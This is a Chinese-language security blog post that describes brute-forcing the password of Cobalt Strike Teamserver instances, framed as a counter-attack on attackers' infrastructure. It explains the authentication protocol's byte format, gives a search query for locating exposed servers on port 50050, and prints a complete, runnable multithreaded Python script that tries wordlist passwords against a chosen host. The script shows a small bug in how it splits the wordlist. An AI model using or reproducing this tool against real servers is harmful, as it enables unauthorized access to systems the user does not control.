防守反制--爆破CS Teamserver 密碼
VSole2022-07-12 22:26:24
0x00:簡介#
Cobalt strike(下面簡稱 CS)#
眾所周知,CS是一個以MSF為基礎的GUI框架式“多人運動”滲透測試工具,集成了端口轉發、服務掃描、自動化溢出,多模式端口監聽,exe、powershell木馬生成等.#
釣魚攻擊包括:站點克隆,目標信息獲取,java執行,瀏覽器自動攻擊等。#
Cobalt Strike 主要用于團隊作戰,可謂是團隊滲透神器,能讓多個攻擊者同時連接到團體服務器上,共享攻擊資源與目標信息和sessions。#
Cobalt Strike 作為一款協同APT工具,針對內網的滲透測試和作為apt的控制終端功能,使其變成眾多APT組織的首選。#

0x01:成因#
1、很多團隊為了方便基友能夠很快連上 Teamserver,基本都是設置的弱口令,一般常見的是:123456、123123等#
2、很多也使用的默認的 Teamserver端口50050#
3、集合以上薄弱入口點,開始測試爆破連接。#
0x02:編寫#
一、自己teamserver鏈接測試。在服務器搭建好服務端后,通過瀏覽器去訪問測試。google瀏覽器測試結果如下。#

在火狐的瀏覽器測試結果如下#

F12看下什么情況#

二、我們去看一下Teamserver的認證方式。#

if [ -e ./cobaltstrike.store ]; then
print_info "Will use existing X509 certificate and keystore (for SSL)"
else
print_info "Generating X509 certificate and keystore (for SSL)"
keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
fi
# start the team server.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
第一種是表面上用于保護套接字的身份驗證的原始數據類型。#
第二種是基于Java序列化對象的身份驗證,其中包括大部分為符號的用戶名。#
其中cobaltstrike.store是這樣的#

在固定的261字節長度的命令中,第一個身份驗證請求大致是這樣定義的:#
4 Byte Magic \x00\x00\xBE\xEF 1 Byte Password Length (unsigned int) Password (unsigned int cast char array) Padding \x65 "A" * ( Length( Password ) - 256 )
在導線上看起來像這樣,但是填充被忽略,可以是任何東西。身份驗證例程最多讀取256個“長度”。#
\x00\x00\xBE\xEF\x08passwordAAAAAAAAAAAAAA...AAAA
如果提供的密碼與啟動團隊服務器時定義的密碼匹配,則團隊服務器將以4字節的密碼進行回復。#
<此密碼不能為空>
\x00\x00\xCA\xFE
否則,團隊服務器返回null#
\x00\x00\x00\x00
三、python3編寫思路#
conn.open(host, port) payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A")) conn.send(payload)
最后判斷返回結果是否存在“\x00\x00\xca\xfe”,如果存在則密碼正確#
四、找找公雞隊的Teamserver#

"Cobalt strike" && port="50050"
五、開整
#!/usr/bin/env python3
import time,socket,ssl,argparse,concurrent.futures,sys
MIN_PYTHON = (3, 3)
if sys.version_info < MIN_PYTHON:
sys.exit("Python %s.%s or later is required." % MIN_PYTHON)
parser = argparse.ArgumentParser()
parser.add_argument("host",
help="Teamserver address")
parser.add_argument("wordlist", nargs="?",
help="Newline-delimited word list file")
args = parser.parse_args()
class NotConnectedException(Exception):
def __init__(self, message=None, node=None):
self.message = message
self.node = node
class DisconnectedException(Exception):
def __init__(self, message=None, node=None):
self.message = message
self.node = node
class Connector:
def __init__(self):
self.sock = None
self.ssl_sock = None
self.ctx = ssl.SSLContext()
self.ctx.verify_mode = ssl.CERT_NONE
pass
def is_connected(self):
return self.sock and self.ssl_sock
def open(self, hostname, port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(10)
self.ssl_sock = self.ctx.wrap_socket(self.sock)
if hostname == socket.gethostname():
ipaddress = socket.gethostbyname_ex(hostname)[2][0]
self.ssl_sock.connect((ipaddress, port))
else:
self.ssl_sock.connect((hostname, port))
def close(self):
if self.sock:
self.sock.close()
self.sock = None
self.ssl_sock = None
def send(self, buffer):
if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
self.ssl_sock.sendall(buffer)
def receive(self):
if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
received_size = 0
data_buffer = b""
while received_size < 4:
data_in = self.ssl_sock.recv()
data_buffer = data_buffer + data_in
received_size += len(data_in)
return data_buffer
def passwordcheck(password):
if len(password) > 0:
result = None
conn = Connector()
conn.open(args.host, 50050)
payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A"))
conn.send(payload)
if conn.is_connected(): result = conn.receive()
if conn.is_connected(): conn.close()
if result == bytearray(b"\x00\x00\xca\xfe"): return password
else: return False
else: print("Do not have a blank password!!!")
passwords = []
if args.wordlist: passwords = open(args.wordlist).read().split("")
else:
for line in sys.stdin: passwords.append(line.rstrip())
if len(passwords) > 0:
attempts = 0
failures = 0
with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
future_to_check = {executor.submit(passwordcheck, password): password for password in passwords}
for future in concurrent.futures.as_completed(future_to_check):
password = future_to_check[future]
try:
data = future.result()
attempts = attempts + 1
if data:
print ("Successful Attack!!!")
print ("Secquan NB!!")
print("Target Password: {}".format(password))
except Exception as exc:
failures = failures + 1
print('%r generated an exception: %s' % (password, exc))
else:
print("Password(s) required")

執行方式 test.py x.x.x.x pass.txt#
pass.txt是你要爆破的密碼文件
VSole
網絡安全專家